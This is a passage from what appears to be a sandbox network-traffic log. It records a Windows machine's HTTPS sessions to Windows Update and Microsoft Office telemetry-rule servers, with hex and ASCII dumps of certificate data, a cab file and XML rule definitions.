2024-11-11 00:14:14 UTC	8666	IN	Data Raw: 04 01 31 2f 30 2d 30 0a 02 05 00 e1 2b 8a 50 02 01 00 30 0a 02 01 00 02 02 12 fe 02 01 ff 30 07 02 01 00 02 02 11 e6 30 0a 02 05 00 e1 2c db d0 02 01 00 30 36 06 0a 2b 06 01 04 01 84 59 0a 04 02 31 28 30 26 30 0c 06 0a 2b 06 01 04 01 84 59 0a 03 02 a0 0a 30 08 02 01 00 02 03 07 a1 20 a1 0a 30 08 02 01 00 02 03 01 86 a0 30 0d 06 09 2a 86 48 86 f7 0d 01 01 05 05 00 03 81 81 00 0c d9 08 df 48 94 57 65 3e ad e7 f2 17 9c 1f ca 3d 4d 6c cd 51 e1 ed 9c 17 a5 52 35 0f fd de 4b bd 22 92 c5 69 e5 d7 9f 29 23 72 40 7a ca 55 9d 8d 11 ad d5 54 00 bb 53 b4 87 7b 72 84 da 2d f6 e3 2c 4f 7e ba 1a 58 88 6e d6 b9 6d 16 ae 85 5b b5 c2 81 a8 e0 ee 0a 9c 60 51 3a 7b e4 61 f8 c3 e4 38 bd 7d 28 17 d6 79 f0 c8 58 c6 ef 1f f7 88 65 b1 ea 0a c0 df f7 ee 5c 23 c2 27 fd 98 63 08 31 Data Ascii: 1/0-0+P000,06+Y1(0&0+Y0 00*HHWe>=MlQR5K"i)#r@zUTS{r-,O~Xnm[`Q:{a8}(yXe\#'c1

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49763	172.202.163.200	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 00:14:52 UTC	306	OUT	GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=y+2aSXpCNotGH4M&MD=tMZ5WaH2 HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33 Host: slscr.update.microsoft.com
2024-11-11 00:14:52 UTC	560	IN	HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: application/octet-stream Expires: -1 Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT ETag: "vic+p1MiJJ+/WMnK08jaWnCBGDfvkGRzPk9f8ZadQHg=_1440" MS-CorrelationId: 6f73aea0-76b6-4b36-8db0-9075963077a3 MS-RequestId: d08078af-1bce-4db4-9f75-c98d1c6b0180 MS-CV: CZ6wvn6wX0KLP/Ms.0 X-Microsoft-SLSClientCache: 1440 Content-Disposition: attachment; filename=environment.cab X-Content-Type-Options: nosniff Date: Mon, 11 Nov 2024 00:14:52 GMT Connection: close Content-Length: 30005
2024-11-11 00:14:52 UTC	15824	IN	Data Raw: 4d 53 43 46 00 00 00 00 8d 2b 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 5b 49 00 00 14 00 00 00 00 00 10 00 8d 2b 00 00 a8 49 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 72 4d 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 fe f6 51 be 21 2b 72 4d 43 4b ed 7c 05 58 54 eb da f6 14 43 49 37 0a 02 d2 b9 86 0e 41 52 a4 1b 24 a5 bb 43 24 44 18 94 90 92 52 41 3a 05 09 95 ee 54 b0 00 91 2e e9 12 10 04 11 c9 6f 10 b7 a2 67 9f bd cf 3e ff b7 ff b3 bf 73 ed e1 9a 99 f5 c6 7a d7 bb de f5 3e cf fd 3c f7 dc 17 4a 1a 52 e7 41 a8 97 1e 14 f4 e5 25 7d f4 05 82 82 c1 20 30 08 06 ba c3 05 02 11 7f a9 c1 ff d2 87 5c 1e f4 ed 65 8e 7a 1f f6 0a 40 03 1d 7b f9 83 2c 1c 2f db b8 3a 39 3a 58 38 ba 73 5e Data Ascii: MSCF+D[I+IdrMenvironment.cabQ!+rMCK\|XTCI7AR$C$DRA:T.og>sz><JRA%} 0\ez@{,/:9:X8s^
2024-11-11 00:14:52 UTC	14181	IN	Data Raw: 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 26 30 24 06 03 55 04 03 13 1d 4d 69 63 72 6f 73 6f 66 74 20 54 69 6d 65 2d 53 74 61 6d 70 20 50 43 41 20 32 30 31 30 30 1e 17 0d 32 33 31 30 31 32 31 39 30 37 32 35 5a 17 0d 32 35 30 31 31 30 31 39 30 37 32 35 5a 30 81 d2 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 2d 30 2b 06 03 55 04 0b 13 24 4d 69 63 72 6f Data Ascii: UUS10UWashington10URedmond10UMicrosoft Corporation1&0$UMicrosoft Time-Stamp PCA 20100231012190725Z250110190725Z010UUS10UWashington10URedmond10UMicrosoft Corporation1-0+U$Micro

Session ID	Source IP	Source Port	Destination IP	Destination Port
8	192.168.2.4	49764	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 00:14:54 UTC	195	OUT	GET /rules/other-Win32-v19.bundle HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 00:14:54 UTC	492	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 00:14:54 GMT Content-Type: text/plain Content-Length: 218853 Connection: close Vary: Accept-Encoding Cache-Control: public Last-Modified: Sat, 09 Nov 2024 18:56:51 GMT ETag: "0x8DD00F04568BDCF" x-ms-request-id: 6e4cbc8d-b01e-0021-268e-33cab7000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T001454Z-16547b76f7fkcrm9hC1DFWxdag0000000dbg00000000rvsy x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT X-Cache-Info: L1_T2 Accept-Ranges: bytes
2024-11-11 00:14:54 UTC	15892	IN	Data Raw: 31 30 30 30 76 35 2b 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 30 30 22 20 56 3d 22 35 22 20 44 43 3d 22 45 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 52 75 6c 65 45 72 72 6f 72 73 41 67 67 72 65 67 61 74 65 64 22 20 41 54 54 3d 22 66 39 39 38 63 63 35 62 61 34 64 34 34 38 64 36 61 31 65 38 65 39 31 33 66 66 31 38 62 65 39 34 2d 64 64 31 32 32 65 30 61 2d 66 63 66 38 2d 34 64 63 35 2d 39 64 62 62 2d 36 61 66 61 63 35 33 32 35 31 38 33 2d 37 34 30 35 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 53 3d 22 37 30 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 50 53 50 20 50 53 55 22 20 Data Ascii: 1000v5+<?xml version="1.0" encoding="utf-8"?><R Id="1000" V="5" DC="ESM" EN="Office.Telemetry.RuleErrorsAggregated" ATT="f998cc5ba4d448d6a1e8e913ff18be94-dd122e0a-fcf8-4dc5-9dbb-6afac5325183-7405" SP="CriticalBusinessImpact" S="70" DL="A" DCa="PSP PSU"
2024-11-11 00:14:54 UTC	16384	IN	Data Raw: 20 20 20 3c 56 20 56 3d 22 34 30 30 22 20 54 3d 22 49 33 32 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 42 22 20 49 3d 22 35 22 20 4f 3d 22 66 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 47 45 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 Data Ascii: <V V="400" T="I32" /> </R> </O> </R> </O> </C> <C T="B" I="5" O="false"> <O T="AND"> <L> <O T="GE"> <L> <S T="1" F="0" /> </L> <R> <V
2024-11-11 00:14:54 UTC	16384	IN	Data Raw: 32 30 76 33 2b 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 38 32 30 22 20 56 3d 22 33 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 4f 75 74 6c 6f 6f 6b 2e 44 65 73 6b 74 6f 70 2e 43 6f 6e 74 61 63 74 43 61 72 64 50 72 6f 70 65 72 74 69 65 73 43 6f 75 6e 74 73 22 20 41 54 54 3d 22 64 38 30 37 36 30 39 32 37 36 37 34 34 32 34 35 62 61 66 38 31 62 66 37 62 63 38 30 33 33 66 36 2d 32 32 36 38 65 33 37 34 2d 37 37 36 36 2d 34 39 37 36 2d 62 65 34 34 2d 62 36 61 64 35 62 64 64 63 35 62 36 2d 37 38 31 33 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 41 20 54 3d 22 31 22 20 45 3d 22 54 Data Ascii: 20v3+<?xml version="1.0" encoding="utf-8"?><R Id="10820" V="3" DC="SM" EN="Office.Outlook.Desktop.ContactCardPropertiesCounts" ATT="d807609276744245baf81bf7bc8033f6-2268e374-7766-4976-be44-b6ad5bddc5b6-7813" DCa="PSU" xmlns=""> <S> <A T="1" E="T
2024-11-11 00:14:54 UTC	16384	IN	Data Raw: 20 54 3d 22 32 22 20 46 3d 22 41 76 65 72 61 67 65 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 39 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 50 75 72 67 65 64 5f 41 67 65 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 34 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 30 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 50 75 72 67 65 64 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 35 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 31 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 46 69 6c 65 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 38 22 20 46 3d Data Ascii: T="2" F="Average" /> </C> <C T="U32" I="9" O="true" N="Purged_Age"> <S T="4" F="Count" /> </C> <C T="U32" I="10" O="true" N="Purged_Count"> <S T="5" F="Count" /> </C> <C T="U32" I="11" O="true" N="File_Count"> <S T="8" F=
2024-11-11 00:14:54 UTC	16384	IN	Data Raw: 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6f 75 6e 74 5f 43 72 65 61 74 65 43 61 72 64 5f 56 61 6c 69 64 4d 61 6e 61 67 65 72 5f 46 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6f 75 6e 74 5f 43 72 65 61 74 65 52 65 73 75 6c 74 5f 56 61 6c 69 64 50 65 72 73 6f 6e 61 5f 46 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a Data Ascii: alse"> <C> <S T="10" /> </C> </C> <C T="U32" I="1" O="false" N="Count_CreateCard_ValidManager_False"> <C> <S T="11" /> </C> </C> <C T="U32" I="2" O="false" N="Count_CreateResult_ValidPersona_False"> <C>
2024-11-11 00:14:54 UTC	16384	IN	Data Raw: 20 49 3d 22 31 39 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 50 61 69 6e 74 5f 49 4d 73 6f 50 65 72 73 6f 6e 61 5f 57 61 73 4e 75 6c 6c 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 33 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 50 61 69 6e 74 5f 49 4d 73 6f 50 65 72 73 6f 6e 61 5f 4e 75 6c 6c 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6c 65 61 6e 75 70 Data Ascii: I="19" O="false" N="Paint_IMsoPersona_WasNull_Count"> <C> <S T="32" /> </C> </C> <C T="U32" I="20" O="false" N="Paint_IMsoPersona_Null_Count"> <C> <S T="33" /> </C> </C> <C T="U32" I="21" O="false" N="Cleanup
2024-11-11 00:14:55 UTC	16384	IN	Data Raw: 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 32 30 30 22 20 54 3d 22 49 36 34 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 4c 54 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 52 65 74 72 69 65 76 61 6c 4d 69 6c 6c 69 73 65 63 6f 6e 64 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 Data Ascii: </L> <R> <V V="200" T="I64" /> </R> </O> </L> <R> <O T="LT"> <L> <S T="3" F="RetrievalMilliseconds" /> </L> <R>
2024-11-11 00:14:55 UTC	16384	IN	Data Raw: 0a 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 3c 2f 46 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 4f 63 6f 6d 32 49 55 43 4f 66 66 69 63 65 49 6e 74 65 67 72 61 74 69 6f 6e 46 69 72 73 74 43 61 6c 6c 53 75 63 63 65 73 73 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 4f 63 6f 6d 32 49 55 43 4f 66 66 69 63 65 49 6e 74 65 67 72 61 74 69 6f 6e 46 69 72 73 74 43 61 6c 6c 46 61 69 6c 65 64 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 Data Ascii: </O> </F> </S> <C T="U32" I="0" O="false" N="Ocom2IUCOfficeIntegrationFirstCallSuccessCount"> <C> <S T="9" /> </C> </C> <C T="U32" I="1" O="false" N="Ocom2IUCOfficeIntegrationFirstCallFailedCount"> <C>
2024-11-11 00:14:55 UTC	16384	IN	Data Raw: 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 54 65 6e 61 6e 74 20 65 6e 61 62 6c 65 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 55 73 65 72 20 65 6e 61 62 6c 65 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 66 61 6c 73 65 22 20 54 3d 22 42 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: O T="AND"> <L> <S T="3" F="Tenant enabled" /> </L> <R> <O T="EQ"> <L> <S T="3" F="User enabled" /> </L> <R> <V V="false" T="B" />
2024-11-11 00:14:55 UTC	16384	IN	Data Raw: 20 3c 53 20 54 3d 22 32 22 20 46 3d 22 48 74 74 70 53 74 61 74 75 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 34 22 20 54 3d 22 55 33 32 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 3c 2f 46 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 37 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 47 45 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 32 22 20 46 3d 22 48 74 74 70 53 74 61 74 75 73 22 20 2f 3e 0d 0a 20 20 Data Ascii: <S T="2" F="HttpStatus" /> </L> <R> <V V="404" T="U32" /> </R> </O> </F> <F T="7"> <O T="AND"> <L> <O T="GE"> <L> <S T="2" F="HttpStatus" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
9	192.168.2.4	49767	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 00:14:55 UTC	192	OUT	GET /rules/rule224902v2s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 00:14:56 UTC	470	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 00:14:56 GMT Content-Type: text/xml Content-Length: 450 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:25 GMT ETag: "0x8DC582BD4C869AE" x-ms-request-id: 37d16035-f01e-0003-2c60-2e4453000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T001456Z-17df447cdb56j5xmhC1DFWn91800000009v00000000043q8 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-11 00:14:56 UTC	450	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 32 32 34 39 30 32 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 31 30 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 55 54 53 20 54 3d 22 32 22 20 49 64 3d 22 62 62 72 35 71 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 33 22 20 47 3d 22 7b 61 33 36 61 39 37 30 64 2d 34 35 61 39 2d 34 65 30 64 2d 39 63 61 62 2d 32 61 32 33 35 63 63 39 64 37 63 36 7d 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 47 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 4e Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="224902" V="2" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120100" /> <UTS T="2" Id="bbr5q" /> <SS T="3" G="{a36a970d-45a9-4e0d-9cab-2a235cc9d7c6}" /> </S> <C T="G" I="0" O="falseN

Session ID	Source IP	Source Port	Destination IP	Destination Port
10	192.168.2.4	49768	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 00:14:55 UTC	192	OUT	GET /rules/rule120608v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 00:14:56 UTC	538	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 00:14:56 GMT Content-Type: text/xml Content-Length: 2160 Connection: close Vary: Accept-Encoding Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT ETag: "0x8DC582BA3B95D81" x-ms-request-id: dcc6854f-e01e-0051-7b03-2d84b2000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T001456Z-16547b76f7f22sh5hC1DFWyb4w0000000d6g00000000m1dm x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-11 00:14:56 UTC	2160	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 37 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 33 22 20 52 3d 22 31 32 30 36 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 34 22 20 52 3d 22 31 32 30 36 31 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 35 22 20 52 3d 22 31 32 30 36 31 34 22 20 2f 3e 0d 0a 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120608" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <R T="1" R="120609" /> <R T="2" R="120679" /> <R T="3" R="120610" /> <R T="4" R="120612" /> <R T="5" R="120614" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
11	192.168.2.4	49769	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 00:14:55 UTC	192	OUT	GET /rules/rule120609v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 00:14:56 UTC	491	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 00:14:56 GMT Content-Type: text/xml Content-Length: 408 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT ETag: "0x8DC582BB56D3AFB" x-ms-request-id: 9f0f5f99-201e-0096-25f1-2cace6000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T001456Z-16547b76f7f2g4rlhC1DFWnx880000000d8000000000ep51 x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-11 00:14:56 UTC	408	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 38 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 44 64 5d 5b 45 65 5d 5b 4c 6c 5d 5b 4c 6c 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120609" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120682" /> <SR T="2" R="^([Dd][Ee][Ll][Ll])"> <S T="1" F="0" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">

Session ID	Source IP	Source Port	Destination IP	Destination Port
12	192.168.2.4	49766	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 00:14:55 UTC	192	OUT	GET /rules/rule120600v4s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 00:14:56 UTC	494	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 00:14:56 GMT Content-Type: text/xml Content-Length: 2980 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:10 GMT ETag: "0x8DC582BA80D96A1" x-ms-request-id: 3648f464-f01e-0003-3e3a-334453000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T001456Z-17df447cdb54ntx4hC1DFW2k4000000009yg000000001qfw x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
